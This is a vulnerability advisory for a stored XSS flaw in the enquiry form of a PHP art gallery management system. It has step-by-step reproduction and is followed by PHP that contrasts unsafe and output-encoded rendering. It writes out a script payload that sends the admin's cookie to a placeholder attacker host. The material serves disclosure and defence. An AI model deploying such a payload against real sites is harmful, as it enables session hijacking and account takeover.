> [Suggested description]
> A stored cross-site scripting (XSS) vulnerability in Art Gallery
> Management System Project v1.0 allows attackers to execute arbitrary
> web scripts or HTML via a crafted payload injected into the message
> parameter on the enquiry page.
>
> ------------------------------------------
>
> [Additional Information]
> Steps-To-Reproduce:
> Step 1: Go to the Project Home page http://localhost/Art-Gallery-MS-PHP/index.php
> Step 2: While scrolling the home page we see the enquiry option of the product in the New Arrivals.
> Step 3: Now click on the enquiry option of any product; then we are redirected to the Enquiry page.
>         URL: http://127.0.0.1/Art-Gallery-MS-PHP/art-enquiry.php?eid=2
> Step 4: Now fill out the Enquiry form and put the payload in the message field.
>         Payload: test<script>fetch("http://attacker.com/?cookie=" + btoa(document.cookie));</script>
> Step 5: message : test<script>fetch("http://attacker.com/?cookie=" + btoa(document.cookie));</script>
> Step 6: Now click on the send button.
> Step 7: Now when the admin logs in to the admin panel or checks the Unanswer Enquiry, the XSS payload is executed and the attacker gets the admin cookie.
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> https://phpgurukul.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Art Gallery Management System Project in PHP - 1.0
>
> ------------------------------------------
>
> [Affected Component]
> /Art-Gallery-MS-PHP/art-enquiry.php?eid=2
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross-Site Scripting (XSS) is a type of cyber attack that allows an attacker to inject malicious code into a website. When a victim visits the compromised website, the injected code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, steal cookies, or perform other malicious actions.
>
> Stored XSS is a type of XSS that involves injecting malicious code into a website's persistent storage, such as a database, which is then served to users when they access the website.
>
> Form-based Cross-Site Scripting (XSS) attacks can have serious consequences for both individuals and organizations. By injecting malicious code into a website through a form field, an attacker can potentially steal sensitive information, and an admin cookie, redirect victims to malicious websites, execute unauthorized actions on behalf of the victim, and even inject additional malicious code into the website to continue executing malicious actions.
>
> ------------------------------------------
>
> [Reference]
> https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/
> https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
>
> ------------------------------------------
>
> [Discoverer]
> Yogesh Verma
Use CVE-2023-23158.
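The root cause described above is a stored value being written into the admin page's HTML without output encoding. The following PHP is an added example, not code from the PHPGurukul project: it assumes (hypothetically) that the admin "Unanswered Enquiry" view concatenates the stored `message` column into a table cell, and shows that pattern beside the hardened one that encodes at the point of rendering. The sample message is constructed to match the shape of the payload in the report.

```php
<?php
// Added example, not the project's code. The vulnerable function models the
// assumed pattern (stored message concatenated into markup); the safe function
// is the fix: HTML-encode at output time for the HTML text context.

declare(strict_types=1);

/** Vulnerable pattern: stored text goes into the HTML body unchanged. */
function render_message_unsafe(string $storedMessage): string
{
    return '<td>' . $storedMessage . '</td>';
}

/** Hardened pattern: encode for the HTML text context at the point of output. */
function render_message_safe(string $storedMessage): string
{
    // ENT_QUOTES also encodes ' and " (so the same helper is safe inside
    // attribute values), ENT_SUBSTITUTE keeps invalid UTF-8 from turning the
    // whole cell into an empty string, and the explicit charset avoids a
    // mismatch between the database connection encoding and the page encoding.
    $encoded = htmlspecialchars(
        $storedMessage,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return '<td>' . $encoded . '</td>';
}

// Constructed sample with the same shape as the reported payload.
$sample = 'test<script>fetch("http://attacker.com/?cookie=" + btoa(document.cookie));</script>';

$unsafe = render_message_unsafe($sample);
$safe   = render_message_safe($sample);

// The unsafe rendering still contains a live <script> element; the safe
// rendering contains only the literal text &lt;script&gt; and cannot execute.
assert(str_contains($unsafe, '<script>'));
assert(!str_contains($safe, '<script>'));
assert(str_contains($safe, '&lt;script&gt;'));

echo "unsafe: {$unsafe}\n";
echo "safe:   {$safe}\n";
```

The fix belongs at output, not input: stripping `<script>` from the form submission leaves every other HTML context (attributes, event handlers, URL contexts) and every other path into the database unprotected, and it corrupts legitimate messages that happen to contain angle brackets. Marking the admin session cookie `HttpOnly` and sending a `Content-Security-Policy` without `'unsafe-inline'` are defence-in-depth measures that limit what a payload of this kind can do if an encoding call is missed elsewhere, but neither replaces the encoding.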